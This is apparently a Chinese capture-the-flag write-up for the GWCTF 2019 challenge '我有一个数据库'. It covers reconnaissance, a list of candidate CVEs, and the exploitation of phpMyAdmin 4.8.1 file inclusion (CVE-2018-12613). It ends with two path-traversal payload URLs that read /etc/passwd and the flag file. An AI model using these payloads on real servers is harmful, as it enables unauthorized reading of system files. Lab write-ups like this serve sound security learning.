[GWCTF 2019]我有一个数据库
打开直接乱码,源码中也是乱码,而且还翻译不出来,但是可以在网络中刷新查看到原型
直接上扫描
打开robots.txt文件
phpinfo页面没有发现啥有用的信息
再打开phpmyadmin页面
这里显示了数据库的版本号、apache的版本号、php的版本号、phpmyadmin的版本号
直接在里面搜索数据啥也没有
只能对给出的版本信息突破,找相关的cve进行注入
- mysql 5.5.62 Mysql本地提权及远程代码执行漏洞浅析(CVE-2016-6662)
- Apache HTTPD 换行解析漏洞(CVE-2017-15715)
- PHP远程代码执行漏洞复现(CVE-2019-11043)
- phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613
每个都大致复现了一遍,最后只有phpmyadmin这个CVE有点希望
phpMyAdmin 4.8.1 远程文件包含 CVE-2018-12613 漏洞复现_Senimo_的博客-CSDN博客
按照CVE的步骤
构造payload
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../flag